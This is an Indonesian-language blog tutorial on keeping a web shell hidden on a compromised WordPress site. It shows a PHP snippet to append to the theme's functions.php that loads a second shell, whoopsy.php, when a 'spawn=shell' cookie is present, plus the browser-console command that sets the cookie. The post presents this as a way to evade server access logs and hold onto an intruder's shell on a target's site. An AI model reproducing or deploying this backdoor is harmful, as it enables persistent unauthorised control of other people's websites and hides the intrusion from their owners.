Ad Unit (Iklan) BIG

Create hidden shell backdoor in WordPress - Can't detected in access_log

Posting Komentar

 


-

Hai sobat

Saya ikal,

Disini saya akan sharing sesuatu yang menarik nih.

-


Okeh sesuai judul kita kali ini, kita akan melakukan sebuah trik dimana trik tersebut dapat mengecoh web dev :D.


Saya jelaskan sedikit, disini saya ingin melakukan suatu trik, dimana sebuah shell backdoor tidak dapat terdeteksi oleh access_log sebuah server. tentunya trik ini sangat berguna untuk mempertahankan shell backdooor mu selama mungkin. Sebagai contoh seperti thumbnail gambar diatas tadi :D.


Okeh kita langsung saja.

Bahan : 

- Shell yang udah terupload di web bercms WordPress.

 

 1. Cek Theme yang terpakai.

 Hal pertama yang harus kalian lakukan adalah mengecek tema apa yang terpakai pada target WordPress mu dengan cara melakukan view-source: atau melalui Ctrl + U, Lalu kita ketik Ctrl + F secara bersamaan dan ketikan kata content/themes/ dan lihat tema apa yang terpakai.

 


Disini saya memilih
tema adobasinc walau dibawahnya terdapat tema lain yang dipakai pada target saya.

 

2. Pergi kepath tema tsb, lalu edit file functions.php

Hal kedua yang harus kalian lakukan adalah buka shell kalian, lalu akses path tema yang dipakai tadi.

 


Disini saya menerapkannya menggunakan shell alfa team. Jika sudah masuk ke path temanya, kalian klik Ctrl + F, lalu ketikan functions.php.

 


klik file functions.php tadi, lalu salin dan pastekan kode dibawah ini tepat dipaling bawah source code dari file functions.php nya.

 

if( isset($_COOKIE["spawn"]) && $_COOKIE["spawn"] == "shell"){
    include("whoopsy.php");
    exit;
}

 

 

Save, dan upload shell baru dipath yang sama dengan file functions.php. lalu rename shell tersebut menjadi whoopsy.php dan klik Save.


3. Pemanggilan shell

Langkah ketiga adalah memanggil shell kita. kita akses file index.php diwebnya lalu kita lakukan Inspect element dengan mengklik kanan lalu klik Inspeksi Elemen atau Inspect. Jika diandroid kalian lakukan hal berikut Cara Inspect Element di Andoid. 

 

Jika Fiture inspeksi elemen sudah aktif, kalian cari dan klik yang bertuliskan Console atau Konsol dan ketikan kata berikut pada column console nya.

 

document.cookie = "spawn=shell"

 


Jika sudah mempastekan kode diatas, kalian klik Enter. Lalu refresh websitenya dan lihat hasilnya.



Dan Whoopsy. Shell kalian berhasil terpanggil. "Bang ini file index.php nya rusak ga nanti?" Jawabannya "Kaga :D", "Bang ini berarti semua orang bisa ngakses shell kita dong, malah makin gampang ditikung dong" Kalian bisa sesuaikan sendiri cookienya nanti :D.


Okeh segini saja artikel kali ini, Kurang lebihnya biarkan saja.


Referensi : 

https://youtu.be/wyz1Dzhwptk

 

Thanks

See U

Haikal_
Hai sobat, Saya ikal. Disini kalian bisa learning mengenai sesuatu dari setiap artikel yang saya buat :D.
Terbaru Terlama

Related Posts

There is no other posts in this category.

Posting Komentar

Dapatkan Notifikasi Dengan Email